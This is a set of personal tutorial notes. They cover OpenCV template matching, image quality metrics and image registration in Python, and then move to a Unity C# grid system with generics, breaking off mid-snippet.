    OBJECT DETECTION WITH TEMPLATES

• We need a source image and a template image.
• The template image T is slid over the source image (as in 2D convolution), and the program tries to find matches using statistics.
• Several comparison methods are implemented in OpenCV.
• It returns a grayscale image, where each pixel denotes how well the neighbourhood of that pixel matches the template (a small worked example of this score follows this list).
• Once you have the result, you can use the cv2.minMaxLoc() function to find where the maximum/minimum value is. Take it as the top-left corner of the rectangle and take (w, h) as the width and height of the rectangle.
• That rectangle can be drawn on the region of the matched template.
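
As a small worked example of what one entry of that result image means (my addition; img_gray, template, and h, w = template.shape are defined in the code below), the TM_SQDIFF score at a hypothetical offset (x, y) is just a sum of squared differences:

import numpy as np

x, y = 10, 20  # hypothetical top-left corner of one candidate window
patch = img_gray[y:y + h, x:x + w].astype(np.float32)
sqdiff = np.sum((patch - template.astype(np.float32)) ** 2)
# cv2.matchTemplate(..., cv2.TM_SQDIFF) fills the result image with this score
# evaluated at every valid offset.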

• Template matching, single object in an image.
• We try multiple methods to see which one works best.

import cv2
import numpy as np
import matplotlib.pyplot as plt
img_rgb = cv2.imread('images/Ti_powder.tif')
img_gray = cv2.cvtColor(img_rgb, cv2.COLOR_BGR2GRAY)
plt.imshow(img_gray, cmap='gray')
    <matplotlib.image.AxesImage at 0x263a924c550>

    png

template = cv2.imread('images/Ti_powder_single.tif', 0)
plt.imshow(template, cmap='gray')
    <matplotlib.image.AxesImage at 0x263ae0a4be0>

    png

h, w = template.shape
h, w
    (18, 16)
• For TM_SQDIFF, a good match yields a minimum value; a bad match yields large values.
• For all the other methods it is exactly the opposite: maximum value = good fit.
# Methods available: ['cv2.TM_CCOEFF', 'cv2.TM_CCOEFF_NORMED', 'cv2.TM_CCORR',
#                     'cv2.TM_CCORR_NORMED', 'cv2.TM_SQDIFF', 'cv2.TM_SQDIFF_NORMED']
res = cv2.matchTemplate(img_gray, template, cv2.TM_SQDIFF)
plt.imshow(res, cmap='gray')
    <matplotlib.image.AxesImage at 0x263ae0ff8e0>

    png

min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)
min_val, max_val, min_loc, max_loc
    (4.0, 7702931.0, (318, 418), (66, 407))
# Use max_loc for all methods except TM_SQDIFF, where the best match is the minimum
top_left = min_loc
bottom_right = (top_left[0] + w, top_left[1] + h)

# Black rectangle with thickness 1
cv2.rectangle(img_gray, top_left, bottom_right, 0, 1)

plt.imshow(img_gray, cmap='gray')
    <matplotlib.image.AxesImage at 0x263ae4de220>

    png


    Template matching - multiple objects

• For multiple occurrences, cv2.minMaxLoc() won't give all the locations.
• So we need to set a threshold on the match score instead.
import cv2
import numpy as np
from matplotlib import pyplot as plt

img_rgb = cv2.imread('images/Ti_powder.tif')
img_gray = cv2.cvtColor(img_rgb, cv2.COLOR_BGR2GRAY)
template = cv2.imread('images/Ti_powder_single.tif', 0)
h, w = template.shape

res = cv2.matchTemplate(img_gray, template, cv2.TM_CCOEFF_NORMED)
plt.imshow(res, cmap='gray')
    <matplotlib.image.AxesImage at 0x263ae67ac40>

    png

# Pick only values above 0.8. For TM_CCOEFF_NORMED, larger values = better fit.
threshold = 0.8

loc = np.where(res >= threshold)
# np.where outputs 2 arrays (row indices and column indices).
# Combine these arrays to get x,y coordinates - take x from one array and y from the other.

# Reminder: zip is an iterator of tuples where the first item of each input is paired
# together, then the second item, then the third, etc.

for pt in zip(*loc[::-1]):  # [::-1] swaps the arrays into (x, y) order for drawing
    # Draw a rectangle around each object: we know the top left (pt), so draw a
    # rectangle matching the size of the template image.
    cv2.rectangle(img_rgb, pt, (pt[0] + w, pt[1] + h), (0, 0, 255), 1)  # red in BGR, thickness 1
plt.imshow(img_rgb)
    <matplotlib.image.AxesImage at 0x263a957fc10>

    png


    Tutorial 48 - Image quality metrics using a reference image - in python

Common metrics to quantify image quality (reference based)

• Mean squared error (MSE), $MSE=\frac{1}{n}\Sigma(y-\hat{y})^2$ (the mean of the squared differences between actual and predicted values)

• Root mean squared error (RMSE) - the square root of MSE

• Peak signal to noise ratio (PSNR), $PSNR=10\cdot \log_{10}\left(\frac{MAX_I^2}{MSE}\right)$ ($MAX_I$ is the maximum possible pixel value; for an 8-bit image it is 255; a manual numpy sketch of these formulas follows this list)

• SSIM: structural similarity index, which takes texture into account.
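
As a minimal sketch (my addition, not part of the tutorial), the first three formulas translate directly to numpy; a and b are assumed to be two same-shaped uint8 images:

import numpy as np

def mse(a, b):
    # mean of squared differences, computed in float to avoid uint8 overflow
    return np.mean((a.astype(np.float64) - b.astype(np.float64)) ** 2)

def rmse(a, b):
    return np.sqrt(mse(a, b))

def psnr(a, b, max_val=255.0):
    m = mse(a, b)
    # PSNR diverges for identical images, since the MSE is 0
    return np.inf if m == 0 else 10 * np.log10(max_val ** 2 / m)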

import cv2
import numpy as np
from sewar import full_ref
from skimage import metrics

ref_img = cv2.imread("images/sandstone.tif", 1)
img = cv2.imread("images/sandstone_blur_2sigma.tif", 1)
mse_skimg = metrics.mean_squared_error(ref_img, img)
print("MSE: based on scikit-image = ", mse_skimg)
    MSE: based on scikit-image =  170.83926291047953
psnr_skimg = metrics.peak_signal_noise_ratio(ref_img, img, data_range=None)
print("PSNR: based on scikit-image = ", psnr_skimg)
    PSNR: based on scikit-image =  25.80492671881574
rmse_skimg = metrics.normalized_root_mse(ref_img, img)  # note: this is the *normalized* RMSE
print("RMSE: based on scikit-image = ", rmse_skimg)
    RMSE: based on scikit-image =  0.10647019507436659
from skimage.metrics import structural_similarity as ssim
ssim_skimg = ssim(ref_img, img,
                  data_range=img.max() - img.min(),
                  multichannel=True)  # deprecated argument name; newer skimage uses channel_axis
print("SSIM: based on scikit-image = ", ssim_skimg)
SSIM: based on scikit-image =  0.6631528566884437
C:\Users\gzjzx\AppData\Local\Temp\ipykernel_7180\3842229405.py:2: FutureWarning: `multichannel` is a deprecated argument name for `structural_similarity`. It will be removed in version 1.0. Please use `channel_axis` instead.  ssim_skimg = ssim(ref_img, img,

If the two images are identical:

img = ref_img
mse_skimg = metrics.mean_squared_error(ref_img, img)
print("MSE: based on scikit-image = ", mse_skimg)
psnr_skimg = metrics.peak_signal_noise_ratio(ref_img, img, data_range=None)
print("PSNR: based on scikit-image = ", psnr_skimg)
rmse_skimg = metrics.normalized_root_mse(ref_img, img)
print("RMSE: based on scikit-image = ", rmse_skimg)
from skimage.metrics import structural_similarity as ssim
ssim_skimg = ssim(ref_img, img,
                  data_range=img.max() - img.min(),
                  multichannel=True)
print("SSIM: based on scikit-image = ", ssim_skimg)
MSE: based on scikit-image =  0.0
PSNR: based on scikit-image =  inf
RMSE: based on scikit-image =  0.0
SSIM: based on scikit-image =  1.0
C:\Users\gzjzx\anaconda3\lib\site-packages\skimage\metrics\simple_metrics.py:163: RuntimeWarning: divide by zero encountered in double_scalars  return 10 * np.log10((data_range ** 2) / err)
C:\Users\gzjzx\AppData\Local\Temp\ipykernel_7180\397432051.py:8: FutureWarning: `multichannel` is a deprecated argument name for `structural_similarity`. It will be removed in version 1.0. Please use `channel_axis` instead.  ssim_skimg = ssim(ref_img, img,
ref_img = cv2.imread("images/sandstone.tif", 1)
img = cv2.imread("images/sandstone_blur_2sigma.tif", 1)
• ERGAS: global relative error

"""
calculates global relative error

GT: first (original) input image.
P: second (deformed) input image.
r: ratio of high resolution to low resolution (default=4).
ws: sliding window size (default = 8).

:returns: float -- ergas value.
"""
ergas_img = full_ref.ergas(ref_img, img, r=4, ws=8)
print("ERGAS: global relative error = ", ergas_img)
ERGAS: global relative error =  5267.3334783814835
• Multiscale structural similarity index

"""calculates multi-scale structural similarity index (ms-ssim).

:param GT: first (original) input image.
:param P: second (deformed) input image.
:param weights: weights for each scale (default = [0.0448, 0.2856, 0.3001, 0.2363, 0.1333]).
:param ws: sliding window size (default = 11).
:param K1: First constant for SSIM (default = 0.01).
:param K2: Second constant for SSIM (default = 0.03).
:param MAX: Maximum value of datarange (if None, MAX is calculated using image dtype).

:returns: float -- ms-ssim value.
"""
msssim_img = full_ref.msssim(ref_img, img, weights=[0.0448, 0.2856, 0.3001, 0.2363, 0.1333], ws=11, K1=0.01, K2=0.03, MAX=None)
print("MSSSIM: multi-scale structural similarity index = ", msssim_img)
    MSSSIM: multi-scale structural similarity index =  (0.8966196945619169+0j)
• PSNR

"""calculates peak signal-to-noise ratio (psnr).

:param GT: first (original) input image.
:param P: second (deformed) input image.
:param MAX: maximum value of datarange (if None, MAX is calculated using image dtype).

:returns: float -- psnr value in dB.
"""
psnr_img = full_ref.psnr(ref_img, img, MAX=None)
print("PSNR: peak signal-to-noise ratio = ", psnr_img)
    PSNR: peak signal-to-noise ratio =  25.80492671881574
• PSNRB: PSNR with Blocking Effect Factor for a given pair of images (PSNR-B)

"""Calculates PSNR with Blocking Effect Factor for a given pair of images (PSNR-B)

:param GT: first (original) input image in YCbCr format or Grayscale.
:param P: second (corrected) input image in YCbCr format or Grayscale.

:return: float -- psnr_b.
"""
psnrb_img = full_ref.psnrb(ref_img, img)
print("PSNRB: peak signal-to-noise ratio with blocking effect = ", psnrb_img)
    PSNRB: peak signal-to-noise ratio with blocking effect =  25.80492671881574
• Relative average spectral error (RASE)

"""calculates relative average spectral error (rase).

:param GT: first (original) input image.
:param P: second (deformed) input image.
:param ws: sliding window size (default = 8).

:returns: float -- rase value.
"""
RASE_img = full_ref.rase(ref_img, img, ws=8)
print("RASE: relative average spectral error = ", RASE_img)
    RASE: relative average spectral error =  760.2741004137694
• RMSE

"""calculates root mean squared error (rmse).

:param GT: first (original) input image.
:param P: second (deformed) input image.

:returns: float -- rmse value.
"""
rmse_img = full_ref.rmse(ref_img, img)
print("RMSE: root mean squared error = ", rmse_img)
    RMSE: root mean squared error =  13.07054944944854
• Root mean squared error (RMSE) using a sliding window

"""calculates root mean squared error (rmse) using sliding window.

:param GT: first (original) input image.
:param P: second (deformed) input image.
:param ws: sliding window size (default = 8).

:returns: tuple -- rmse value,rmse map.
"""
rmse_sw_img = full_ref.rmse_sw(ref_img, img, ws=8)
print("RMSE_SW: root mean squared error with sliding window = ", rmse_sw_img)
    RMSE_SW: root mean squared error with sliding window =  (11.495024661505164, array([[[6.31466547, 6.31466547, 6.31466547],        [6.34182545, 6.34182545, 6.34182545],        [6.10327781, 6.10327781, 6.10327781],        ...,        [7.47704821, 7.47704821, 7.47704821],        [7.13267131, 7.13267131, 7.13267131],        [7.23057743, 7.23057743, 7.23057743]],       [[5.84433486, 5.84433486, 5.84433486],        [5.8255901 , 5.8255901 , 5.8255901 ],        [5.52409495, 5.52409495, 5.52409495],        ...,        [8.14996166, 8.14996166, 8.14996166],        [7.76912962, 7.76912962, 7.76912962],        [7.94217382, 7.94217382, 7.94217382]],       [[5.9187203 , 5.9187203 , 5.9187203 ],        [5.84967948, 5.84967948, 5.84967948],        [5.51701912, 5.51701912, 5.51701912],        ...,        [7.7741559 , 7.7741559 , 7.7741559 ],        [7.49478986, 7.49478986, 7.49478986],        [7.71463706, 7.71463706, 7.71463706]],       ...,       [[6.12627538, 6.12627538, 6.12627538],        [5.84967948, 5.84967948, 5.84967948],        [5.89623821, 5.89623821, 5.89623821],        ...,        [6.6602834 , 6.6602834 , 6.6602834 ],        [6.55982088, 6.55982088, 6.55982088],        [6.43234017, 6.43234017, 6.43234017]],       [[5.92927061, 5.92927061, 5.92927061],        [5.71319744, 5.71319744, 5.71319744],        [5.8656841 , 5.8656841 , 5.8656841 ],        ...,        [6.66848933, 6.66848933, 6.66848933],        [6.51800391, 6.51800391, 6.51800391],        [6.27245965, 6.27245965, 6.27245965]],       [[5.69539287, 5.69539287, 5.69539287],        [5.48007755, 5.48007755, 5.48007755],        [5.55512151, 5.55512151, 5.55512151],        ...,        [6.83053805, 6.83053805, 6.83053805],        [6.63678198, 6.63678198, 6.63678198],        [6.09559267, 6.09559267, 6.09559267]]]))
• Spectral angle mapper (SAM)

"""calculates spectral angle mapper (sam).

:param GT: first (original) input image.
:param P: second (deformed) input image.

:returns: float -- sam value.
"""
ref_sam_img = full_ref.sam(ref_img, img)
print("REF_SAM: spectral angle mapper = ", ref_sam_img)
    REF_SAM: spectral angle mapper =  0.106389325534101
• Structural similarity index

"""calculates structural similarity index (ssim).

:param GT: first (original) input image.
:param P: second (deformed) input image.
:param ws: sliding window size (default = 8).
:param K1: First constant for SSIM (default = 0.01).
:param K2: Second constant for SSIM (default = 0.03).
:param MAX: Maximum value of datarange (if None, MAX is calculated using image dtype).

:returns: tuple -- ssim value, cs value.
"""
ssim_img = full_ref.ssim(ref_img, img, ws=11, K1=0.01, K2=0.03, MAX=None, fltr_specs=None, mode='valid')
print("SSIM: structural similarity index = ", ssim_img)
    SSIM: structural similarity index =  (0.7221593484301166, 0.7224356503602157)
• Universal image quality index

"""calculates universal image quality index (uqi).

:param GT: first (original) input image.
:param P: second (deformed) input image.
:param ws: sliding window size (default = 8).

:returns: float -- uqi value.
"""
UQI_img = full_ref.uqi(ref_img, img, ws=8)
print("UQI: universal image quality index = ", UQI_img)
    UQI: universal image quality index =  0.9892148366610988
• Pixel Based Visual Information Fidelity (vif-p)

"""calculates Pixel Based Visual Information Fidelity (vif-p).

:param GT: first (original) input image.
:param P: second (deformed) input image.
:param sigma_nsq: variance of the visual noise (default = 2)

:returns: float -- vif-p value.
"""
VIFP_img = full_ref.vifp(ref_img, img, sigma_nsq=2)
print("VIFP: Pixel Based Visual Information Fidelity = ", VIFP_img)
    VIFP: Pixel Based Visual Information Fidelity =  0.27836263237462544

    Tutorial 49 - No reference based image quality estimation by quantifying sharpness

Paper: Sharpness Estimation for Document and Scene Images

    Sharpness Estimation for Document and Scene Images

pip install -e .
Obtaining file:///C:/Users/gzjzx/Jupyter/DIP/pydom-master
  Preparing metadata (setup.py): started
  Preparing metadata (setup.py): finished with status 'done'
Requirement already satisfied: numpy in c:\users\gzjzx\anaconda3\lib\site-packages (from pydom==0.1) (1.23.1)
Requirement already satisfied: opencv-python in c:\users\gzjzx\anaconda3\lib\site-packages (from pydom==0.1) (4.6.0.66)
Installing collected packages: pydom
  Running setup.py develop for pydom
Successfully installed pydom-0.1
Note: you may need to restart the kernel to use updated packages.
from dom import DOM
import cv2

img1 = cv2.imread("images/Osteosarcoma_01.tif", 1)
img2 = cv2.imread("images/Osteosarcoma_01_1sigma_blur.tif", 1)
img3 = cv2.imread("images/Osteosarcoma_01_2sigma_blur.tif", 1)
iqa = DOM()
• Compute the sharpness index:
score1 = iqa.get_sharpness(img1)
score2 = iqa.get_sharpness(img2)
score3 = iqa.get_sharpness(img3)

print("Sharpness for reference image:", score1)
print("Sharpness for 1sigma blurred image:", score2)
print("Sharpness for 2sigma blurred image:", score3)
Sharpness for reference image: 0.720903262659802
Sharpness for 1sigma blurred image: 0.8156158621086446
Sharpness for 2sigma blurred image: 0.5502472959626157

    Tutorial 50 - No reference based image quality using BRISQUE -in Python

• BRISQUE calculates the no-reference image quality score for an image using the Blind/Referenceless Image Spatial Quality Evaluator (BRISQUE).
• The BRISQUE score is computed using a support vector regression (SVR) model trained on an image database with corresponding differential mean opinion score (DMOS) values.
• The database contains images with known distortions such as compression artifacts, blurring, and noise.
• The image to be scored must have at least one of the distortions for which the model was trained.
    pip install image-quality
    import numpy as np
    from skimage import io, img_as_float
    import imquality.brisque as brisque

It won't run for now… I'll sort it out some other time. (A possible workaround is sketched right below.)
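While imquality is broken here, one possible workaround (an assumption, not tested in these notes) is the BRISQUE implementation in opencv-contrib-python. It needs the two pretrained files brisque_model_live.yml and brisque_range_live.yml from the opencv_contrib repository; the local paths below are placeholders:

import cv2

img_cv = cv2.imread('images/noisy_images/sandstone_25sigma_noisy.tif')

# Paths to the model files (from opencv_contrib, modules/quality/samples) are assumed here.
score = cv2.quality.QualityBRISQUE_compute(img_cv, 'brisque_model_live.yml', 'brisque_range_live.yml')
print("BRISQUE score =", score[0])  # compute() returns a scalar tuple; lower generally means better quality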

    #img = img_as_float(io.imread('noisy_images/BSE.jpg', as_gray=True))
    img = img_as_float(io.imread('images/noisy_images/sandstone_25sigma_noisy.tif', as_gray=True))

    score = brisque.score(img)
    print("Brisque score = ", score)

    # Now let us check BRISQUE scores for a few blurred images.

    img0 = img_as_float(io.imread('images/blurred_images/sandstone.tif', as_gray=True))
    img2 = img_as_float(io.imread('images/blurred_images/sandstone_2sigma_blur.tif', as_gray=True))
    img3 = img_as_float(io.imread('images/blurred_images/sandstone_3sigma_blur.tif', as_gray=True))
    img5 = img_as_float(io.imread('images/blurred_images/sandstone_5sigma_blur.tif', as_gray=True))

    score0 = brisque.score(img0)
    score2 = brisque.score(img2)
    score3 = brisque.score(img3)
    score5 = brisque.score(img5)

    print("BRISQUE Score for 0 blur = ", score0)
    print("BRISQUE Score for 2sigma blur = ", score2)
    print("BRISQUE Score for 3sigma blur = ", score3)
    print("BRISQUE Score for 5sigma blur = ", score5)
from skimage.metrics import peak_signal_noise_ratio

# img1 (the 1-sigma blur) was never loaded above; assumed path, following the naming pattern of the other files:
img1 = img_as_float(io.imread('images/blurred_images/sandstone_1sigma_blur.tif', as_gray=True))

psnr_1 = peak_signal_noise_ratio(img0, img1)
psnr_2 = peak_signal_noise_ratio(img0, img2)

    print("PSNR for 1sigma blur = ", psnr_1)
    print("PSNR for 2sigma blur = ", psnr_2)
PSNR for 1sigma blur =  37.288893529075025
PSNR for 2sigma blur =  33.23605158876105

    Tutorial 46 - Useful image registration libraries in python

I don't really understand this yet…

Various types of image registration

• Translation
• Rigid body (translation + rotation)
• Scaled rotation (translation + rotation + scaling)
• Affine (translation + rotation + scaling + shearing)
• Bilinear (non-linear transformation; does not preserve straight lines)

    image_registration library - inspired by astronomers
    pip install image_registration

    2-D rigid translation

• Chi2shift: Find the offsets between image 1 and image 2 using the DFT upsampling method combined with $\chi^2$ to measure the errors on the fit.
• Cross correlation shift: Use cross-correlation and a $2^{nd}$ order Taylor expansion to measure the offset between two images.

Optical flow based image shift
    part of scikit-image (and also opencv)

• Optical flow is the vector field (u, v).
• For every pixel in image 1 you get a vector showing where it moved to in image 2.
• The vector field can then be used for registration by image warping, as sketched below.
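With scikit-image this looks roughly like the following sketch (TV-L1 optical flow plus a warp; it reuses the same Osteosarcoma image pair as the examples below):

import numpy as np
from skimage import io
from skimage.registration import optical_flow_tvl1
from skimage.transform import warp

image = io.imread("images/Osteosarcoma_01.tif", as_gray=True)
offset_image = io.imread("images/Osteosarcoma_01_transl.tif", as_gray=True)

# Estimate the per-pixel flow field (v = row displacement, u = column displacement).
v, u = optical_flow_tvl1(image, offset_image)

# Warp the moving image back onto the reference using the estimated flow.
nr, nc = image.shape
row_coords, col_coords = np.meshgrid(np.arange(nr), np.arange(nc), indexing='ij')
registered = warp(offset_image, np.array([row_coords + v, col_coords + u]), mode='edge')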

Pystackreg library
pip install pystackreg

• Python/C++ port of the ImageJ extension TurboReg/StackReg written by Philippe Thevenaz/EPFL.
• Automatic alignment of a source image or a stack (movie) to a target image/reference frame.
• Performs translation, rigid body, scaled rotation, and affine (basic usage is sketched after the list below).

Also…

• register each frame to the previous
• register to first image
• register to mean image
• register to mean of first 10 images
• calculate a moving average of 10 images, then register the moving average to the mean of the first 10 images and transform the original image (not the moving average)
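For a single image pair, pystackreg looks roughly like this (a minimal sketch; one transformation model per StackReg instance):

from pystackreg import StackReg
from skimage import io

ref = io.imread("images/Osteosarcoma_01.tif", as_gray=True)         # reference image
mov = io.imread("images/Osteosarcoma_01_transl.tif", as_gray=True)  # image to align

# Other models: StackReg.TRANSLATION, StackReg.SCALED_ROTATION, StackReg.AFFINE, StackReg.BILINEAR
sr = StackReg(StackReg.RIGID_BODY)

# Register mov against ref and return the transformed (aligned) image.
registered = sr.register_transform(ref, mov)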
    from skimage import io
    from image_registration import chi2_shift

    image = io.imread("images/Osteosarcoma_01.tif", as_gray=True)
    offset_image = io.imread("images/Osteosarcoma_01_transl.tif", as_gray=True)
• Method 1: chi squared shift
  • Find the offsets between image 1 and image 2 using the DFT upsampling method (2-D rigid).
noise = 0.1
xoff, yoff, exoff, eyoff = chi2_shift(image, offset_image, noise, return_error=True, upsample_factor='auto')

    print("Offset image was translated by: 18, -17")
    print("Pixels shifted by: ", xoff, yoff)

    from scipy.ndimage import shift
    corrected_image = shift(offset_image, shift=(-xoff,-yoff), mode='constant')

    from matplotlib import pyplot as plt
    fig = plt.figure(figsize=(10, 10))
    ax1 = fig.add_subplot(2,2,1)
    ax1.imshow(image, cmap='gray')
    ax1.title.set_text('Input Image')
    ax2 = fig.add_subplot(2,2,2)
    ax2.imshow(offset_image, cmap='gray')
    ax2.title.set_text('Offset image')
    ax3 = fig.add_subplot(2,2,3)
    ax3.imshow(corrected_image, cmap='gray')
    ax3.title.set_text('Corrected')
    plt.show()
Offset image was translated by: 18, -17
Pixels shifted by:  18.001953125 -16.990234375

[figure: input image, offset image, and corrected result]

• Method 2: Cross correlation based shift
  • Use cross-correlation and a 2nd order Taylor expansion to measure the shift.
    from skimage import io
    from image_registration import cross_correlation_shifts

    image = io.imread("images/Osteosarcoma_01.tif", as_gray=True)
    offset_image = io.imread("images/Osteosarcoma_01_transl.tif", as_gray=True)
    # offset image translated by (-17, 18) in y and x


    xoff, yoff = cross_correlation_shifts(image, offset_image)


    print("Offset image was translated by: 18, -17")
    print("Pixels shifted by: ", xoff, yoff)


    from scipy.ndimage import shift
    corrected_image = shift(offset_image, shift=(-xoff,-yoff), mode='constant')

    from matplotlib import pyplot as plt
    fig = plt.figure(figsize=(10, 10))
    ax1 = fig.add_subplot(2,2,1)
    ax1.imshow(image, cmap='gray')
    ax1.title.set_text('Input Image')
    ax2 = fig.add_subplot(2,2,2)
    ax2.imshow(offset_image, cmap='gray')
    ax2.title.set_text('Offset image')
    ax3 = fig.add_subplot(2,2,3)
    ax3.imshow(corrected_image, cmap='gray')
    ax3.title.set_text('Corrected')
    plt.show()
Offset image was translated by: 18, -17
Pixels shifted by:  18.00140750783571 -16.988641048024164

[figure: input image, offset image, and corrected result]

    Tutorial 47 - Image registration using pystackreg library

    Image registration using pystackreg

• Python/C++ port of the ImageJ extension TurboReg/StackReg written by Philippe Thevenaz/EPFL.
• Automatic alignment of a source image or a stack (movie) to a target image/reference frame.
• Performs translation, rigid body, scaled rotation, and affine.

Also…

• register each frame to the previous
• register to first image
• register to mean image
• register to mean of first 10 images
• calculate a moving average of 10 images, then register the moving average to the mean of the first 10 images and transform the original image (not the moving average); see the sketch after this list
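The reference modes listed above map directly onto pystackreg's register_transform_stack parameters. A sketch, assuming img_stack is a 3-D NumPy array with the frame index as the first axis:

from pystackreg import StackReg

sr = StackReg(StackReg.RIGID_BODY)

out_prev = sr.register_transform_stack(img_stack, reference='previous')   # each frame to the previous
out_first = sr.register_transform_stack(img_stack, reference='first')     # each frame to the first frame
out_mean = sr.register_transform_stack(img_stack, reference='mean')       # each frame to the mean image
out_first10 = sr.register_transform_stack(img_stack, reference='first', n_frames=10)  # mean of first 10 frames
# Estimate on a 10-frame moving average, then apply the transforms to the original frames:
out_mavg = sr.register_transform_stack(img_stack, reference='first', n_frames=10, moving_average=10)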
Related resources

I used this Unity grid system for my undergraduate thesis project, but I didn't take notes back then and have mostly forgotten it (orz). Now I'm dusting it off for the algorithms course assignment… watching only the first three parts is enough to implement A*.

This CodeMonkey guy's coding chops are seriously impressive; I wouldn't mind learning it all over again.

Main text

Grid system

    Grid System in Unity (Heatmap, Pathfinding, Building Area)

Designing the Grid class

Create a Grid class with the following members:

• width: grid width
• height: grid height
• cellSize: cell size
• originPosition: origin position
• gridArray: the grid array
• debugTextArray: TextMesh array for debugging
    private int width;
    private int height;
    private float cellSize;
    private Vector3 originPosition;
    private int[,] gridArray;
    private TextMesh[,] debugTextArray;

Designing the constructor

Design the constructor public Grid(int width, int height, float cellSize, Vector3 originPosition):

public Grid(int width, int height, float cellSize, Vector3 originPosition)
{
    this.width = width;
    this.height = height;
    this.cellSize = cellSize;
    this.originPosition = originPosition;

    gridArray = new int[width, height];
    debugTextArray = new TextMesh[width, height];

    for (int x = 0; x < gridArray.GetLength(0); x++)
    {
        for (int y = 0; y < gridArray.GetLength(1); y++)
        {
            debugTextArray[x, y] = UtilsClass.CreateWorldText(gridArray[x, y].ToString(), null, GetWorldPosition(x, y) + new Vector3(cellSize, cellSize) * .5f, 20, Color.white, TextAnchor.MiddleCenter);
            Debug.DrawLine(GetWorldPosition(x, y), GetWorldPosition(x, y + 1), Color.white, 100f);
            Debug.DrawLine(GetWorldPosition(x, y), GetWorldPosition(x + 1, y), Color.white, 100f);
        }
    }
    Debug.DrawLine(GetWorldPosition(0, height), GetWorldPosition(width, height), Color.white, 100f);
    Debug.DrawLine(GetWorldPosition(width, 0), GetWorldPosition(width, height), Color.white, 100f);
}

Coordinate conversion

At this point there are two coordinate systems:

• grid coordinates XY (the array indices)
• the in-game world coordinates WorldPosition

Two functions convert between them:

private Vector3 GetWorldPosition(int x, int y)
{
    return new Vector3(x, y) * cellSize + originPosition;
}

private void GetXY(Vector3 worldPosition, out int x, out int y)
{
    x = Mathf.FloorToInt((worldPosition - originPosition).x / cellSize);
    y = Mathf.FloorToInt((worldPosition - originPosition).y / cellSize);
}
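A quick worked example: with cellSize = 10 and originPosition = (20, 0), GetWorldPosition(1, 1) returns (1, 1) * 10 + (20, 0) = (30, 10); in the other direction, GetXY on a world position of (35, 12) computes FloorToInt((35 - 20) / 10) = 1 and FloorToInt(12 / 10) = 1, i.e. grid cell (1, 1).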

Setting values in the grid

Set a value in the grid by either kind of coordinate:

public void SetValue(int x, int y, int value)
{
    if (x >= 0 && y >= 0 && x < width && y < height)
    {
        gridArray[x, y] = value;
        debugTextArray[x, y].text = gridArray[x, y].ToString();
    }
}

public void SetValue(Vector3 worldPosition, int value)
{
    int x, y;
    GetXY(worldPosition, out x, out y);
    SetValue(x, y, value);
}

Getting values from the grid

Get a value from the grid by either kind of coordinate:

public int GetValue(int x, int y)
{
    if (x >= 0 && y >= 0 && x < width && y < height)
    {
        return gridArray[x, y];
    }
    else
    {
        return 0;
    }
}

public int GetValue(Vector3 worldPosition)
{
    int x, y;
    GetXY(worldPosition, out x, out y);
    return GetValue(x, y);
}

Mouse interaction

Testing.cs uses the Grid class; the mouse can set and read values in the grid. The complete Testing.cs:

using UnityEngine;
using CodeMonkey.Utils;

public class Testing : MonoBehaviour
{
    private Grid grid;
    // Start is called before the first frame update
    void Start()
    {
        grid = new Grid(4, 2, 10f, new Vector3(20, 0));
    }

    private void Update()
    {
        if (Input.GetMouseButtonDown(0))
        {
            grid.SetValue(UtilsClass.GetMouseWorldPosition(), 56);
        }
        if (Input.GetMouseButtonDown(1))
        {
            Debug.Log(grid.GetValue(UtilsClass.GetMouseWorldPosition()));
        }
    }
}

Grid.cs full code

The complete Grid.cs:

using UnityEngine;
using CodeMonkey.Utils;

public class Grid
{
    private int width;
    private int height;
    private float cellSize;
    private Vector3 originPosition;
    private int[,] gridArray;
    private TextMesh[,] debugTextArray;

    public Grid(int width, int height, float cellSize, Vector3 originPosition)
    {
        this.width = width;
        this.height = height;
        this.cellSize = cellSize;
        this.originPosition = originPosition;

        gridArray = new int[width, height];
        debugTextArray = new TextMesh[width, height];

        for (int x = 0; x < gridArray.GetLength(0); x++)
        {
            for (int y = 0; y < gridArray.GetLength(1); y++)
            {
                debugTextArray[x, y] = UtilsClass.CreateWorldText(gridArray[x, y].ToString(), null, GetWorldPosition(x, y) + new Vector3(cellSize, cellSize) * .5f, 20, Color.white, TextAnchor.MiddleCenter);
                Debug.DrawLine(GetWorldPosition(x, y), GetWorldPosition(x, y + 1), Color.white, 100f);
                Debug.DrawLine(GetWorldPosition(x, y), GetWorldPosition(x + 1, y), Color.white, 100f);
            }
        }
        Debug.DrawLine(GetWorldPosition(0, height), GetWorldPosition(width, height), Color.white, 100f);
        Debug.DrawLine(GetWorldPosition(width, 0), GetWorldPosition(width, height), Color.white, 100f);
    }

    private Vector3 GetWorldPosition(int x, int y)
    {
        return new Vector3(x, y) * cellSize + originPosition;
    }

    private void GetXY(Vector3 worldPosition, out int x, out int y)
    {
        x = Mathf.FloorToInt((worldPosition - originPosition).x / cellSize);
        y = Mathf.FloorToInt((worldPosition - originPosition).y / cellSize);
    }

    public void SetValue(int x, int y, int value)
    {
        if (x >= 0 && y >= 0 && x < width && y < height)
        {
            gridArray[x, y] = value;
            debugTextArray[x, y].text = gridArray[x, y].ToString();
        }
    }

    public void SetValue(Vector3 worldPosition, int value)
    {
        int x, y;
        GetXY(worldPosition, out x, out y);
        SetValue(x, y, value);
    }

    public int GetValue(int x, int y)
    {
        if (x >= 0 && y >= 0 && x < width && y < height)
        {
            return gridArray[x, y];
        }
        else
        {
            return 0;
        }
    }

    public int GetValue(Vector3 worldPosition)
    {
        int x, y;
        GetXY(worldPosition, out x, out y);
        return GetValue(x, y);
    }
}

    Powerful Generics Added! Grid System in Unity (Terraria, Minesweeper, Tilemap)

Using generics

The gist: modify the previous chapter's Grid.cs to use generics, making the code reusable.

Rename the class to:

    public class Grid<TGridObject>

The grid array gridArray no longer stores int; its element type becomes <TGridObject>:

    private TGridObject[,] gridArray;

The constructor takes a delegate Func<Grid<TGridObject>, int, int, TGridObject> createGridObject:

    public Grid(int width, int height, float cellSize, Vector3 originPosition, Func<Grid<TGridObject>, int, int, TGridObject> createGridObject)

It uses C# events, which I haven't learned yet (orz), so I copied this part verbatim… (a minimal subscription sketch follows the snippet)

public event EventHandler<OnGridValueChangedEventArgs> OnGridValueChanged;
public class OnGridValueChangedEventArgs : EventArgs
{
    public int x;
    public int y;
}
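Since events are new here, this is what hooking into OnGridValueChanged looks like from the outside. A minimal sketch, assuming a Grid<int> instance named grid:

grid.OnGridValueChanged += (object sender, Grid<int>.OnGridValueChangedEventArgs e) =>
{
    // Fires whenever SetGridObject or TriggerGridObjectChanged is called for a cell.
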